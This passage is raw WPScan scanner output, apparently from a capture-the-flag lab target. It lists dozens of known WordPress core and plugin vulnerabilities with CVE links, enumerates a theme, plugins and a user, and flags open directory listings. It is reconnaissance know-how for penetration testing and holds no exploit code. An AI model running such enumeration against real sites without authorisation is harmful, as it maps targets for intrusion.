Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11
[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11
[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://hackerone.com/reports/153093
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
Reference: https://wpvulndb.com/vulnerabilities/8815
Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
Reference: https://wpvulndb.com/vulnerabilities/8816
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
Reference: https://wpvulndb.com/vulnerabilities/8817
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
Reference: https://wpvulndb.com/vulnerabilities/8818
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
Reference: https://wpvulndb.com/vulnerabilities/8819
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
Reference: https://hackerone.com/reports/203515
Reference: https://hackerone.com/reports/203515
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
[i] Fixed in: 4.2.15
[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
Reference: https://wpvulndb.com/vulnerabilities/8820
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
[i] Fixed in: 4.2.15
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
[i] Fixed in: 4.2.16
[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.7.5
[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41398
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
[i] Fixed in: 4.2.16
[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41457
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
[i] Fixed in: 4.2.16
[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
Reference: https://twitter.com/ircmaxell/status/923662170092638208
Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
[i] Fixed in: 4.2.17
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.2.18
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.2.18
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.2.18
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
Reference: https://wpvulndb.com/vulnerabilities/9053
Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
[i] Fixed in: 4.2.20
[!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
Reference: https://wpvulndb.com/vulnerabilities/9054
Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
[i] Fixed in: 4.2.20
[!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
Reference: https://wpvulndb.com/vulnerabilities/9055
Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
[i] Fixed in: 4.2.20
[!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
Reference: https://wpvulndb.com/vulnerabilities/9100
Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
[i] Fixed in: 4.2.21
[+] WordPress theme in use: bhost - v1.2.9
[+] Name: bhost - v1.2.9
| Last updated: 2018-01-10T00:00:00.000Z
| Location: https://192.168.43.10:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.43.10:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.4.0
| Style URL: https://192.168.43.10:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Enumerating all plugins (may take a while and use a lot of system resources) ...
Time: 00:09:49 <===================================================================================================================================> (76488 / 76488) 100.00% Time: 00:09:49
[+] We found 4 plugins:
[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
| Latest version: 1.0 (up to date)
| Last updated: 2015-10-14T13:52:00.000Z
| Location: https://192.168.43.10:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Readme: https://192.168.43.10:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.43.10:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
[+] Name: akismet
| Latest version: 4.0.8
| Last updated: 2018-06-19T18:18:00.000Z
| Location: https://192.168.43.10:12380/blogblog/wp-content/plugins/akismet/
[!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
[+] Name: shortcode-ui - v0.6.2
| Last updated: 2017-09-12T20:55:00.000Z
| Location: https://192.168.43.10:12380/blogblog/wp-content/plugins/shortcode-ui/
| Readme: https://192.168.43.10:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] The version is out of date, the latest version is 0.7.3
[!] Directory listing is enabled: https://192.168.43.10:12380/blogblog/wp-content/plugins/shortcode-ui/
[+] Name: two-factor
| Latest version: 0.1-dev-20180225
| Last updated: 2018-02-25T10:55:00.000Z
| Location: https://192.168.43.10:12380/blogblog/wp-content/plugins/two-factor/
| Readme: https://192.168.43.10:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.43.10:12380/blogblog/wp-content/plugins/two-factor/
[+] Finished: Tue Sep 25 14:59:04 2018
[+] Elapsed time: 00:09:57
[+] Requests made: 76582
[+] Memory used: 145.18 MB
[GandoPC 192.168.43.10]# wpscan --url https://192.168.43.10:12380/blogblog/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.43.10:12380/blogblog/
[+] Started: Tue Sep 25 15:55:40 2018
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: https://192.168.43.10:12380/blogblog/xmlrpc.php [HTTP 405]
[+] Found an RSS Feed: https://192.168.43.10:12380/blogblog/?feed=rss2 [HTTP 200]
[!] Detected 1 user from RSS feed:
+------------+
| Name |
+------------+
| John Smith |
+------------+
[!] Upload directory has directory listing enabled: https://192.168.43.10:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.43.10:12380/blogblog/wp-includes/
[+] Enumerating WordPress version ...
[!] The WordPress 'https://192.168.43.10:12380/blogblog/readme.html' file exists exposing a version number
[+] WordPress version 4.2.1 (Released on 2015-04-27) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 55 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
